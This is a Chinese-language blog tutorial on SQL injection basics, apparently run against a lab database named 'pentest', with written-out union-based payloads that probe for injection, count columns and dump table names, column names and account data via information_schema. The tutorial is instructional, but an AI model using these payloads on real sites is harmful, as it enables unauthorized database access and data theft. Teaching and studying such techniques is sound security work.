<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="SQL注入基础 ​       SQL注入是指web应用程序对用户输入的数据合法性没有判断，前端传入后端的参数可以被攻击者控制，且参数带入数据库查询，攻击者可以构造不同的SQL语句来对数据库进行操作。">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://yoursite.com/2019/08/20/SQL注入基础/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="SQL注入基础 ​       SQL注入是指web应用程序对用户输入的数据合法性没有判断，前端传入后端的参数可以被攻击者控制，且参数带入数据库查询，攻击者可以构造不同的SQL语句来对数据库进行操作。">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/18e9791179a1d7fd2.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/2.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/3.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/4.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/5.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/6.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/7.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/8.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/9.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/10.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/11.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/12.png">
<meta property="og:image" content="https://s3.ax2x.com/2019/08/30/13.png">
<meta property="og:updated_time" content="2019-08-30T02:49:48.470Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hexo">
<meta name="twitter:description" content="SQL注入基础 ​       SQL注入是指web应用程序对用户输入的数据合法性没有判断，前端传入后端的参数可以被攻击者控制，且参数带入数据库查询，攻击者可以构造不同的SQL语句来对数据库进行操作。">
<meta name="twitter:image" content="https://s3.ax2x.com/2019/08/30/18e9791179a1d7fd2.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.webp">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/highlight.css">
  <script>
  let antiquityStorage = window.sessionStorage.getItem('antiquitySessionStorage');
  if (antiquityStorage == '' || antiquityStorage == null) {
    var antiquityLoader = '<div id="loaderbox"><div class="loader"><div class="load-roll"><div class="load-top"></div><div class="load-right"></div><div class="load-bottom"></div></div></div></div>';
    document.write(antiquityLoader);
    document.body.style.overflow = 'hidden'
  }
  </script>
</head>
</html>
<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" title="图片来自网络">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-SQL注入基础" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
  <div class="article-meta">
    <a href="/2019/08/20/SQL注入基础/" class="article-date">
  <time datetime="2019-08-20T01:09:57.924Z" itemprop="datePublished">2019-08-20</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h3 id="SQL注入基础"><a href="#SQL注入基础" class="headerlink" title="SQL注入基础"></a>SQL注入基础</h3><hr>
<p>​       SQL注入是指web应用程序对用户输入的数据合法性没有判断，前端传入后端的参数可以被攻击者控制，且参数带入数据库查询，攻击者可以构造不同的SQL语句来对数据库进行操作。</p>
<a id="more"></a>

<h3 id="SQL注入漏洞所需条件："><a href="#SQL注入漏洞所需条件：" class="headerlink" title="SQL注入漏洞所需条件："></a>SQL注入漏洞所需条件：</h3><p>​        （1）参数可控：前端传到后端的参数内容是可以被控制的。</p>
<p>​        （2）参数带入数据库查询：前端传入后端的参数可以拼接SQL语句，而且可以带入数据库查询。</p>
<h3 id="SQL注入相关知识点"><a href="#SQL注入相关知识点" class="headerlink" title="SQL注入相关知识点"></a>SQL注入相关知识点</h3><p>​       在MySQL中，有一个默认数据库“information_schema”，库中有三个必须知道的表，如下</p>
<p>​         Schemata表存储了用户创建的所有数据库的库名，该表中记录数据库名的字段名为schema_name。 </p>
<p>​        Tables表存储用户创建的所有数据库的库名和表名，该表中记录数据库库名和表名的字段分别是table_schema和table_name. </p>
<p>​         Columns表存储用户创建的所有数据库的库名、表名、字段名，要记住该表中记 录数据库库名、表名、字段名为table_schema、table_name、columns_name。</p>
<h3 id="注释符号"><a href="#注释符号" class="headerlink" title="注释符号"></a>注释符号</h3><ol>
<li><p># </p>
</li>
<li><p>–空格 空格可以使用+代替 </p>
</li>
<li><p>/**/</p>
</li>
</ol>
<h3 id="SQL注入漏洞探测方法"><a href="#SQL注入漏洞探测方法" class="headerlink" title="SQL注入漏洞探测方法"></a>SQL注入漏洞探测方法</h3><h4 id="用以下步骤可测试是否存在SQL注入："><a href="#用以下步骤可测试是否存在SQL注入：" class="headerlink" title="用以下步骤可测试是否存在SQL注入："></a>用以下步骤可测试是否存在SQL注入：</h4><p>​        1、附加一个单引号“ ‘ ”，例：id = 1’</p>
<p>​        2、附加字符串“and 1 = 1” 例：id = 1’ and 1 = 1</p>
<p>​        3、附加字符串“and1 = 2”  例：id = 1’ and 1 = 2</p>
<h4 id="判断参数是整形还是字符型："><a href="#判断参数是整形还是字符型：" class="headerlink" title="判断参数是整形还是字符型："></a>判断参数是整形还是字符型：</h4><p>​        整形：1、步骤1执行结果正常</p>
<p>​                    2、步骤2执行结果正常</p>
<p>​                    3、步骤3执行异常，与步骤2执行结果不同</p>
<p>​       字符型：1、步骤1执行结果正常</p>
<p>​                      2、步骤2与3执行结果正常</p>
<p>​                      3、步骤3与步骤2执行结果相同</p>
<h3 id="union联合注入"><a href="#union联合注入" class="headerlink" title="union联合注入"></a>union联合注入</h3><h4 id="步骤："><a href="#步骤：" class="headerlink" title="步骤："></a>步骤：</h4><h5 id="1、判断是否存在注入点"><a href="#1、判断是否存在注入点" class="headerlink" title="1、判断是否存在注入点"></a>1、判断是否存在注入点</h5><h5 id="2、查询数据表的字段数量"><a href="#2、查询数据表的字段数量" class="headerlink" title="2、查询数据表的字段数量"></a>2、查询数据表的字段数量</h5><h5 id="3、利用获得的列数使用联合查询获取可利用列"><a href="#3、利用获得的列数使用联合查询获取可利用列" class="headerlink" title="3、利用获得的列数使用联合查询获取可利用列"></a>3、利用获得的列数使用联合查询获取可利用列</h5><h5 id="4、爆数据库名"><a href="#4、爆数据库名" class="headerlink" title="4、爆数据库名"></a>4、爆数据库名</h5><h5 id="5、爆表名"><a href="#5、爆表名" class="headerlink" title="5、爆表名"></a>5、爆表名</h5><h5 id="6、爆字段名"><a href="#6、爆字段名" class="headerlink" title="6、爆字段名"></a>6、爆字段名</h5><h5 id="7、爆数据"><a href="#7、爆数据" class="headerlink" title="7、爆数据"></a>7、爆数据</h5><h4 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h4><h5 id="1、判断是否存在注入点-1"><a href="#1、判断是否存在注入点-1" class="headerlink" title="1、判断是否存在注入点"></a>1、判断是否存在注入点</h5><p>​               (1)  键入  id=1</p>
<p><img src="https://s3.ax2x.com/2019/08/30/18e9791179a1d7fd2.png" alt="img"></p>
<p>​              (2)  键入  id=1’</p>
<p><img src="https://s3.ax2x.com/2019/08/30/2.png" alt="img"></p>
<p>​               (3) 键入  id=1 and 1 = 1</p>
<p><img src="https://s3.ax2x.com/2019/08/30/3.png" alt="img"></p>
<p>​                  (4)键入  id=1 and 1 = 2</p>
<p><img src="https://s3.ax2x.com/2019/08/30/4.png" alt="img"></p>
<h5 id="2、通过order-by-判断字段数"><a href="#2、通过order-by-判断字段数" class="headerlink" title="2、通过order by 判断字段数"></a>2、通过order by 判断字段数</h5><p>​                     （1）键入id=-1 order by 1    //id=-1 是使其不显示正确结果，只显示想要得字段数</p>
<p><img src="https://s3.ax2x.com/2019/08/30/5.png" alt="img"></p>
<p>​                       （2）键入id=-1 order by n     //当第n位返回异常时，字段数位n-1</p>
<p><img src="https://s3.ax2x.com/2019/08/30/6.png" alt="img"></p>
<h5 id="3、通过union-select查询语句查找出可利用字段"><a href="#3、通过union-select查询语句查找出可利用字段" class="headerlink" title="3、通过union select查询语句查找出可利用字段"></a>3、通过union select查询语句查找出可利用字段</h5><p>​                 例：id = -1 union select 1,2,3</p>
<p><img src="https://s3.ax2x.com/2019/08/30/7.png" alt="img"></p>
<h5 id="4、通过union-select查询语句利用字段爆数据库"><a href="#4、通过union-select查询语句利用字段爆数据库" class="headerlink" title="4、通过union select查询语句利用字段爆数据库"></a>4、通过union select查询语句利用字段爆数据库</h5><p><img src="https://s3.ax2x.com/2019/08/30/8.png" alt="img"></p>
<h5 id="5、爆表名-1"><a href="#5、爆表名-1" class="headerlink" title="5、爆表名"></a>5、爆表名</h5><p>​                   例：id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =’pentest’),3 &amp;submit=submit</p>
<p><img src="https://s3.ax2x.com/2019/08/30/9.png" alt="img"></p>
<p>​           6、爆字段名</p>
<p>​                 例：id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema =’pentest’and TABLE_NAME = ‘account’),3 &amp;submit=submit</p>
<p> <img src="https://s3.ax2x.com/2019/08/30/10.png" alt="img"></p>
<p>​        7、爆数据</p>
<p>​              例：id=-1 union select 1,(select id from pentest.account),3 &amp; submit = submit         //其余字段数据只需更改id字段即可</p>
<p><img src="https://s3.ax2x.com/2019/08/30/11.png" alt="img"></p>
<p><img src="https://s3.ax2x.com/2019/08/30/12.png" alt="img"></p>
<p><img src="https://s3.ax2x.com/2019/08/30/13.png" alt="img"></p>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2019/08/19/ms-010漏洞利用/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title"></div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    
<div id="gitmentContainer"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/default-avatar.webp" title="图片来自网络"></img>
    <h3 class="avatar-name">
      
        妆薄铅华浅
      
    </h3>
    <p class="avatar-slogan">
      风华是一指流沙，苍老是一段年华。
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/08/20/SQL注入基础/">(no title)</a>
          </li>
        
          <li>
            <a href="/2019/08/19/ms-010漏洞利用/">(no title)</a>
          </li>
        
          <li>
            <a href="/2019/08/17/Nmap命令详解/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2019 John Doe &nbsp;&nbsp;
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>